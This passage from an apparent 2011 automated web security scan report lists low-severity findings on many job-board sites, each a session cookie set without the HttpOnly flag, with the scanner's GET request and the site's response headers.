Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111827

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.44. http://www.designingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.designingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.designingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:17 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3h4obslpuiqaf86r78fndl2ip2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:17 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122676

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.45. http://www.directstartv.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.directstartv.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:40:28 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: PHPSESSID=hj0vosufv45apdqnbbc9nqnia2; path=/; domain=.directstartv.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: DTV_ISC=0; expires=Fri, 20-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
Set-Cookie: Keyword=deleted; expires=Thu, 21-Jan-2010 18:40:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: EngineID=deleted; expires=Thu, 21-Jan-2010 18:40:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitorID=148176080; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Visits=1; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitID=160462422; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: lpd=default; expires=Tue, 22-Mar-2011 18:40:28 GMT; path=/; domain=.directstartv.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

10.46. http://www.diversitycrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.diversitycrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.diversitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:25 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=oh70k7g7bb01l9sdpsaq85rgq4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:25 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135908

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.47. http://www.dotnetcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dotnetcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.dotnetcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:28 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=r5bbu9cr0v14lapurelqu9r7t1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:28 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111450

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.48. http://www.ecommercecrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ecommercecrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.ecommercecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=jkaapevh1eqi41fjlqg0qqj0f4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122922

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.49. http://www.edfed.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.edfed.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.edfed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:47 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=esnafiva63v7f9obfldsvpdko0; path=/; domain=edfed.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 154433

<script type="text/javascript" src="http://www.edfed.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.edfed.com/script/overlibmws_scroll.js"></script>
<script type="t
...[SNIP]...

10.50. http://www.editingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.editingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.editingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9718dh1vf5ni8ge10ijt7ncv93; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114100

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.51. http://www.educationcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.educationcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.educationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=cv80umbmrn1jnbk6im77qu8nf1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112625

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.52. http://www.employmentauthority.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.employmentauthority.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.employmentauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/; domain=.employmentauthority.com
Set-Cookie: PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/; domain=.employmentauthority.com
Set-Cookie: PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/; domain=.employmentauthority.com
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 86027

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Employment Services, Executive Employment, Executive Search Consultants, Executive Job Openings</title>
<met
...[SNIP]...

10.53. http://www.employmentcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.employmentcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.employmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ep2g7l3vs5a5pub16rrihs9jp3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:55 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103823

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.54. http://www.energycrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.energycrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.energycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:59 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=i3h90hnvarkvvcfesqumj8vhf0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117799

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.55. http://www.engineeringcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.engineeringcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.engineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:03 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u76d1au7ldsubj9jq17ge4lui3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 136413

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.56. http://www.entrylevelcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.entrylevelcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.entrylevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:04 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u5gd5nbnop8c3jphrctn63t6f2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:04 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149370

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.57. http://www.environmentalcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.environmentalcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.environmentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:07 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=dq6vrirkde3igauguqgj7gjfh0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:07 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103899

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.58. http://www.environmentalsafetyhealthcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.environmentalsafetyhealthcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.environmentalsafetyhealthcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kinch90afsop9ot95vej0stu73; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109299

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.59. http://www.erpcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.erpcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.erpcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:16 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=f4lggi6e8n8h982dg6rfsp1522; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:16 GMT
